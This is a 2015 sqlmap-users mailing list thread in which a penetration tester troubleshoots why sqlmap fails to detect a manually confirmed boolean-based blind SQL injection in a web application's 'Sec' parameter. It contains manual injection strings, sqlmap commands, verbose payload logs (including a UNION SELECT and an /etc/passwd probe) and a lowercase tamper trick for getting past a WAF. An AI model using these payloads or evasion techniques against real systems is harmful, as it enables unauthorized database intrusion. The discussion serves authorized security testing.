In the end, it was WAF behaviour that was preventing sqlmap from
identifying the parameter as injectable (more specifically, sqlmap was
sending SQL operators in upper case and the WAF was rejecting it). The
lower-case tamper script circumvented this but I was unable to take
exploitation any further because of other WAF blocking techniques.
On Thu, Apr 30, 2015 at 12:13 AM, Johnathon Doe <hood3dro...@gmail.com> wrote:
> Curious, have you tried using the --prefix and --suffix options to frame
> your injection to see if that helps?
>
> On Wed, Apr 29, 2015 at 2:10 AM, Alistair Johnson <amcljohn...@gmail.com>
> wrote:
>>
>> OK. You're right in that the following lines in your dummy output
>> should produce discernable responses when tested against the
>> application:
>> PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
>> PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
>>
>> I've verified this manually. Thanks and I'll send you the traffic output
>> file.
>>
>> Cheers,
>>
>> Alistair.
>>
>> On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar
>> <miroslav.stam...@gmail.com> wrote:
>> > I would say that you screwed something up. Can you please send that
>> > traffic
>> > file I requested.
>> >
>> > Down below find a line that says: "[08:55:08] [PAYLOAD]
>> > PackageSelection'
>> > AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
>> > invalid.
>> >
>> > $ python sqlmap.py -u
>> > www.site.com/help/UserGuide.aspx?Sec=PackageSelection
>> > --dummy -v 3
>> > _
>> > ___ ___| |_____ ___ ___ {1.0-dev-03f32ae}
>> > |_ -| . | | | .'| . |
>> > |___|_ |_|_|_|_|__,| _|
>> > |_| |_| http://sqlmap.org
>> >
>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>> > prior
>> > mutual consent is illegal. It is the end user's responsibility to obey
>> > all
>> > applicable local, state and federal laws. Developers assume no liability
>> > and
>> > are not responsible for any misuse or damage caused by this program
>> >
>> > [*] starting at 08:55:05
>> >
>> > [08:55:05] [DEBUG] cleaning up configuration parameters
>> > [08:55:05] [DEBUG] setting the HTTP timeout
>> > [08:55:05] [DEBUG] creating HTTP requests opener object
>> > [08:55:05] [DEBUG] heuristically checking if the target is protected by
>> > some
>> > kind of WAF/IPS/IDS
>> > [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
>> > FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
>> > [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
>> > [08:55:05] [INFO] testing if the target URL is stable. This can take a
>> > couple of seconds
>> > [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
>> > comparison on a sequence matcher. If no dynamic nor injectable
>> > parameters
>> > are detected, or in case of junk results, refer to user's manual
>> > paragraph
>> > 'Page comparison' and provide a string or regular expression to match on
>> > how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
>> > [08:55:08] [INFO] searching for dynamic content
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
>> > [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
>> > retry the request
>> > [08:55:08] [INFO] searching for dynamic content
>> > [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
>> > [08:55:08] [PAYLOAD] 2485
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
>> > [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
>> > [08:55:08] [PAYLOAD] 8682
>> > [08:55:08] [INFO] GET parameter 'Sec' is dynamic
>> > [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
>> > [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter
>> > 'Sec'
>> > might not be injectable
>> > [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
>> > [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
>> > [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> > clause'
>> > [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
>> > [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
>> > [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
>> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
>> > [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
>> > [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
>> > [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
>> > [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
>> > [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
>> > [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
>> > [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
>> > [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
>> > [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
>> > [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
>> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
>> > ...
>> >
>> > On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson
>> > <amcljohn...@gmail.com>
>> > wrote:
>> >>
>> >> Hi Brandon,
>> >>
>> >> Thanks for your comment. Confirming that i've tried risk=3 with
>> >> level=5 with the same results. I've looked more closely at the
>> >> requests that sqlmap is sending to check if the parameter is
>> >> injectable. It is testing the Sec paramater with values such as:
>> >>
>> >> PackageSelection) AND 1477=7114
>> >> PackageSelection) AND 1631=1631
>> >> PackageSelection') AND 5603=7729
>> >> PackageSelection') AND 1631=1631
>> >> PackageSelection' AND 3943=9381
>> >> PackageSelection' AND 1631=1631
>> >> PackageSelection" AND 3324=4690
>> >> PackageSelection" AND 1631=1631
>> >> PackageSelection) AND 4734=6616 AND (6346=6346
>> >> PackageSelection)) AND 7350=9272 AND (8861=8861
>> >>
>> >> When in fact, i assume it would need to use logic like I used to get
>> >> distinguishable responses:
>> >>
>> >> PackageSelection (returns response A)
>> >> PackageSelection' AND '1'='1 (returns response A)
>> >> PackageSelection' AND '1'='2 (returns response B)
>> >>
>> >> In a nutshell, it doesn't appear to be trying single quotes and values
>> >> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
>> >> typical format for checking boolean-based blind SQLi.
>> >>
>> >> Cheers,
>> >>
>> >> Alistair.
>> >>
>> >> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
>> >> <bperry.volat...@gmail.com> wrote:
>> >> > It's a GET, so there wouldn't be a content type, unless I am
>> >> > mistaken.
>> >> >
>> >> > Alistair, have you tried --risk=3 with --level=5 yet?
>> >> >
>> >> > Sent from a phone
>> >> >
>> >> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar
>> >> > <miroslav.stam...@gmail.com>
>> >> > wrote:
>> >> >
>> >> > Can you please send the unredacted content of request.txt to my
>> >> > address?
>> >> >
>> >> > If not, then please at least send me the content of traffic file
>> >> > which
>> >> > you
>> >> > can obtain by just appending the "-t traffic.txt" to the regular
>> >> > sqlmap's
>> >> > run.
>> >> >
>> >> > Bye
>> >> >
>> >> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson
>> >> > <amcljohn...@gmail.com>
>> >> > wrote:
>> >> >>
>> >> >> Thanks for the quick reply.
>> >> >>
>> >> >> The contents of the request file are as follows:
>> >> >>
>> >> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>> >> >> Host: <redacted>
>> >> >> Accept: */*
>> >> >> Accept-Language: en
>> >> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;
>> >> >> Win64;
>> >> >> x64; Trident/5.0)
>> >> >> Connection: close
>> >> >> Referer: <redacted>
>> >> >> Cookie: <redacted>
>> >> >>
>> >> >> I've redacted some of the details as it's not appropriate to draw
>> >> >> attention to an internet facing application's SQLi vulnerability.
>> >> >>
>> >> >> When providing the request file as part of the following command:
>> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> >> 'industries' -v 1
>> >> >>
>> >> >> sqlmap executes as normal but cannot identify (and therefore cannot
>> >> >> exploit) the boolean-based blind vulnerability which I've verified
>> >> >> manually.
>> >> >>
>> >> >> Thanks again,
>> >> >>
>> >> >> Al.
>> >> >>
>> >> >>
>> >> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
>> >> >> <miroslav.stam...@gmail.com> wrote:
>> >> >> > And what is the content of request file?
>> >> >> >
>> >> >> > Bye
>> >> >> >
>> >> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
>> >> >> > <amcljohn...@gmail.com>
>> >> >> > wrote:
>> >> >> >>
>> >> >> >> Hi sqlmappers,
>> >> >> >>
>> >> >> >> I'm a fairly experienced user of sqlmap having used it
>> >> >> >> extensively
>> >> >> >> in
>> >> >> >> the past. I came across what appeared to pretty typical
>> >> >> >> boolean-based
>> >> >> >> blind SQLi in an application I'm (legally) testing. However, for
>> >> >> >> the
>> >> >> >> first time, I'm unable to get sqlmap to recognise the parameter
>> >> >> >> as
>> >> >> >> vulnerable to exploit it further. And as we know, manually
>> >> >> >> exploiting
>> >> >> >> blind SQLi is cumbersome to say the least.
>> >> >> >>
>> >> >> >> Here is a summary of the requests i've made to manually confirm
>> >> >> >> the
>> >> >> >> vulnerability.
>> >> >> >>
>> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
>> >> >> >> response
>> >> >> >> A)
>> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
>> >> >> >> response
>> >> >> >> B)
>> >> >> >>
>> >> >> >> I've tried various sqlmap flags and thought the following command
>> >> >> >> would give me the best chance of success:
>> >> >> >>
>> >> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> >> >> 'industries' -v 1
>> >> >> >>
>> >> >> >> Note: the string 'industries' is text that appears in response A
>> >> >> >> but
>> >> >> >> not response B.
>> >> >> >>
>> >> >> >> I've looked at the requests that sqlmap is sending in the
>> >> >> >> background
>> >> >> >> (proxied through burp). It appears that it's attempting to
>> >> >> >> exploit
>> >> >> >> this with the AND statement as it should but is not using single
>> >> >> >> quotes as per my example above.
>> >> >> >>
>> >> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap,
>> >> >> >> i'd
>> >> >> >> be
>> >> >> >> more than happy to contribute some time to improve it so it can
>> >> >> >> identify injectable parameters such as these in the future.
>> >> >> >>
>> >> >> >> Thanks,
>> >> >> >>
>> >> >> >> Al.
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >> ------------------------------------------------------------------------------
>> >> >> >> One dashboard for servers and applications across
>> >> >> >> Physical-Virtual-Cloud
>> >> >> >> Widest out-of-the-box monitoring support with 50+ applications
>> >> >> >> Performance metrics, stats and reports that give you Actionable
>> >> >> >> Insights
>> >> >> >> Deep dive visibility with transaction tracing using APM Insight.
>> >> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >> >> >> _______________________________________________
>> >> >> >> sqlmap-users mailing list
>> >> >> >> sqlmap-users@lists.sourceforge.net
>> >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> > --
>> >> >> > Miroslav Stampar
>> >> >> > http://about.me/stamparm
>> >> >
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > Miroslav Stampar
>> >> > http://about.me/stamparm
>> >> >
>> >> >
>> >> >
>> >> > ------------------------------------------------------------------------------
>> >> > One dashboard for servers and applications across
>> >> > Physical-Virtual-Cloud
>> >> > Widest out-of-the-box monitoring support with 50+ applications
>> >> > Performance metrics, stats and reports that give you Actionable
>> >> > Insights
>> >> > Deep dive visibility with transaction tracing using APM Insight.
>> >> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >> >
>> >> > _______________________________________________
>> >> > sqlmap-users mailing list
>> >> > sqlmap-users@lists.sourceforge.net
>> >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>>
>>
>> ------------------------------------------------------------------------------
>> One dashboard for servers and applications across Physical-Virtual-Cloud
>> Widest out-of-the-box monitoring support with 50+ applications
>> Performance metrics, stats and reports that give you Actionable Insights
>> Deep dive visibility with transaction tracing using APM Insight.
>> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
------------------------------------------------------------------------------
One dashboard for servers and applications across Physical-Virtual-Cloud
Widest out-of-the-box monitoring support with 50+ applications
Performance metrics, stats and reports that give you Actionable Insights
Deep dive visibility with transaction tracing using APM Insight.
http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
